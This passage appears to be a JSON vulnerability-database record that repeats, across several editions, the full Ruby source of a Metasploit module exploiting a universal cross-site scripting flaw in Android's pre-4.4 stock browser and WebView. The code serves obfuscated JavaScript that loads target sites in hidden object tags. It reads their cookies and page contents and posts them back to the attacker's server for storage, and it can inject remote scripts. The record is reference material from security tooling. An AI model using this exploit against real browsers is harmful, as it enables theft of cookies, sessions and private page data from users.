exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-03-19T23:46:10", "differentElements": ["modified", "published"], "edition": 17}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-22T21:42:33", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-03-22T21:42:33"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-03-22T21:42:33", "differentElements": ["modified", "published"], "edition": 18}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-23T07:45:02", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-03-23T07:45:02"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-03-23T07:45:02", "differentElements": ["modified", "published"], "edition": 19}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-25T11:46:34", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-03-25T11:46:34"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-03-25T11:46:34", "differentElements": ["modified", "published"], "edition": 20}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-25T13:48:07", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-03-25T13:48:07"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-03-25T13:48:07", "differentElements": ["modified", "published"], "edition": 21}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-28T09:52:29", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-03-28T09:52:29"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-03-28T09:52:29", "differentElements": ["modified", 